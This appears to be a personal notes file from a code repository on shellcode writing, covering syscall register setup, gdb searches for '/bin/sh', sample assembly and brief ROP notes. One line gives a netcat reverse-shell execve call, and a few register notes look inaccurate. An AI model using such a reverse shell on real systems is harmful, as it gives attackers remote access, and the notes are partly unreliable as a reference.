-
Notifications
You must be signed in to change notification settings - Fork 0
/
shellcodenotes
97 lines (70 loc) · 2.51 KB
/
shellcodenotes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
execve registers: rdi,rsi,rbx
gdb search for strings in libc
Searching memory
first functions need to be imported, then run
find &<functionname>,9999999,"<string>"
another example
find /b 0x7ffff7842000,0x7ffff7bd4000, '/','b','i','n','/','s','h'
#to follow forked shell
set follow-fork-mode child
execve shellcode setup
eax = 0x3b
order: rdi, rsi, rdx
###################################################################
write shellcode setup
ssize_t sys_write(unsigned int fd, const char * buf, size_t count)
rax - temporary register; when we call a syscal, rax must contain syscall number
rdx - used to pass 3rd argument to functions
rdi - used to pass 1st argument to functions
rsi - pointer used to pass 2nd argument to functions
sample ASM x86:
mov edx,len ;message length
mov ecx,msg ;message to write
mov ebx,1 ;file descriptor (stdout)
mov eax,4 ;system call number (sys_write)
int 0x80 ;call kernel
mov eax,1 ;system call number (sys_exit)
int 0x80 ;call kernel
sample ASM x64:
section .data
msg db "hello, world!"
section .text
global _start
_start:
mov rax, 1
mov rdi, 1
mov rsi, msg
mov rdx, 13
syscall
mov rax, 60 ;exit
mov rdi, 0
syscall
###################################################################
exit ASM
mov rax, 1
xor rdi, rdi
syscall
###################################################################
Socket
rsi = 1 (AF_NET)
rdi = 2 (SOCK_STREAM)
rax = 0x29
r9 = IP ADDRESS
###################################################################
NC reverse shell
0x3b syscall rdi rsi r9 r10 rbx rcx rdx
execve ("/bin/nc",{"/bin/nc","<ip>","1337","-e","/bin/sh"},NULL)
###################################################################
fgets register setup
rax = ptr to file descriptor; 01 for stdin
rdi = stack ptr where string will be stored
###################################################################
read
rdi = stdin file descriptor
rsi = buffer
rdx = buffer_size
eax = read syscall 0
###################################################################
ROP notes
When calling system to run /bin/sh, the string pointer didn't work when it was placed on the stack.
test rdi, rdi instruction failed